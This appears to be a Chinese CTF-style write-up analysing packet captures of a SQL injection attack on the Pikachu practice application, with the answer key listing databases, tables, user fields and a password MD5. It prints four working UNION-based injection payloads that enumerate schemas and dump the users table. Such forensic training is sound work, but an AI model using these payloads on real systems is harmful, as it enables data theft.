当前位置: 首页 > news >正文

记一次SQL注入流量分析 | 添柴不加火

目录
  • 题目情景
  • 题目
  • 流量分析
  • 最终答案

题目情景

态感平台近期发出了3条告警信息,疑似有攻击者企图攻击某网站服务器, 平台告警信息可能存在误报,请根据告警信息回答下列问题。

题目

1、查出的数据库名是(多个库名用中文顿号分隔,例如:A、B) :
2、数据库查出的表名(多个表用中文顿号分隔,例如:A、B):
3、用户表包含哪几个字段(多个表用中文顿号分隔,例如:A、B):
4、pikachu用户密码的MD5值是:

流量分析

根据题目描述,我们可以推测出这是SQL注入的流量。
Snipaste_2026-03-24_13-25-27

一共有三个流量包,首先要“统计-协议分级”看看哪一个流量包含有HTTP协议,发现含有HTTP协议的只有第二个流量包,剩下两个流量包都不含HTTP协议,肯定是误报。打开流量包2,先过滤HTTP请求,大致看一下,发现请求方法是POST,接下来过滤POST请求,输入http.request.method=="POST"
1

分析注入语句1:
2
1 UNION ALL SELECT CONCAT(0x716b717171,JSON_ARRAYAGG(CONCAT_WS(0x73626a6a6274,schema_name)),0x717a707671),NULL FROM INFORMATION_SCHEMA.SCHEMATA-- -
这是查库的语句,右键追踪HTTP流,发现返回了5个数据库名
2.1
2.2

分析注入语句2:
3
1 UNION ALL SELECT CONCAT(0x716b717171,JSON_ARRAYAGG(CONCAT_WS(0x73626a6a6274,table_name)),0x717a707671),NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x70696b61636875)-- -
0x70696b61636875 Hex解码得到pikachu
这是查表的语句,右键追踪HTTP流,发现返回了5个表名
3.1

分析注入语句3:
4
1 UNION ALL SELECT CONCAT(0x716b717171,JSON_ARRAYAGG(CONCAT_WS(0x73626a6a6274,column_name,column_type)),0x717a707671),NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x7573657273 AND table_schema=0x70696b61636875-- -
0x70696b61636875 Hex解码得到users
这是查列(字段)的语句,继续追踪HTTP流,发现返回了users表的字段名
4.1

分析注入语句4:
5
1 UNION ALL SELECT CONCAT(0x716b717171,JSON_ARRAYAGG(CONCAT_WS(0x73626a6a6274,'level',id,password,username)),0x717a707671),NULL FROM pikachu.users-- -
这是查users表的所有字段的数据,追踪HTTP流,发现返回了数据,经过判断,得到pikachu密码的MD5值
5.1

最终答案

题目回顾:
1、查出的数据库名是(多个库名用中文顿号分隔,例如:A、B) :
2、数据库查出的表名(多个表用中文顿号分隔,例如:A、B):
3、用户表包含哪几个字段(多个表用中文顿号分隔,例如:A、B):
4、pikachu用户密码的MD5值是:


综上得到最终答案:
数据库名:information_schema、mysql、performance_schema、sys 、pikachu
表名:httpinfo、member、message、users、xssblind
字段名:level、id、password、username
Pikachu密码MD5:670b14728ad9902aecba32e22fa4f6bd


至此,SQL注入流量分析结束,感谢支持!

http://www.jsqmd.com/news/528062/

相关文章:

  • 长城汽车消息总线全面升级,基于 RocketMQ Serverless 实现跨云双活容灾
  • 2026年实测!卫康沃伦勒夫时尚运动手环体验如何?目前卫康沃伦勒夫生产厂家沃伦勒夫显著提升服务 - 品牌推荐师
  • 2026年重庆口碑好的GEO优化服务公司推荐,细聊GEO优化对网站流量的好处 - mypinpai
  • Llama-3.2V-11B-cot 数据预处理教程:图像格式、尺寸与标准化操作
  • 北京地区老酒名酒回收避坑指南:亲测的三大五星回收行深度体验 - 资讯焦点
  • 手头闲置分期乐京东e卡套装怎么处理?这份零门槛换现金指南请收好 - 猎卡回收公众号
  • C语言log10:解析指针与内存管理(上)
  • 聊天总接不上话?这5个技巧让你秒变社交达人!
  • 北京地区老酒回收专业解析|不同需求怎么选?3 家回收行的适配人群精准定位 - 资讯焦点
  • novideo_srgb:实现精准色彩校准的开源工具用户指南
  • 品创共振科技联系方式:关于全网获客服务的客观审视与通用联系指南 - 品牌推荐
  • 漫剧改编的“神兵利器”!唐库新版发布:一键生成500万字+260个深度配角卡 - 资讯焦点
  • 【AI编程系列】Java开发者Cursor AI编程指南:从入门到效率翻倍
  • C语言log9:面向对象思维启蒙:结构体 (Struct) 基础全解
  • YOLO-World实战复现:从环境配置到Demo运行的全流程避坑指南
  • 南方网通讯灵GEO服务重庆代理口碑好的有哪些,费用低吗 - 工业设备
  • C语言_log8:内存越界陷阱与 VS 调试高效技巧
  • log7:函数机制、多文件编程与 static
  • 2026北京茅台老酒回收行业权威排名发布:三大品牌实力领衔,服务口碑双丰收 - 资讯焦点
  • 不用安装LabVIEW也能运行?详解3种LabVIEW程序分发方式的适用场景
  • ChatTTS代码实战:如何通过优化语音合成流程提升3倍处理效率
  • uni-app的生命周期
  • 2026年四川短视频代运营公司推荐:新媒体孵化/视频号/快手孵化/短视频陪跑服务商精选 - 品牌推荐官
  • 如何在普通PC上高效运行macOS:完整实战指南
  • 2026河北PVC彩壳厂家高性价比评测深度解析 - 资讯焦点
  • B站视频缓存转换完整指南:三步解锁m4s格式限制
  • OpenClaw+Qwen3.5-9B多模态实践:截图识别与信息提取自动化
  • 品牌对比:哪些XRF镀层测厚仪综合实力强、用户口碑好? - 品牌推荐大师
  • lessmsi:开源MSI文件提取与分析工具全攻略
  • 如何在Apple Silicon Mac上完美运行iOS游戏:PlayCover终极指南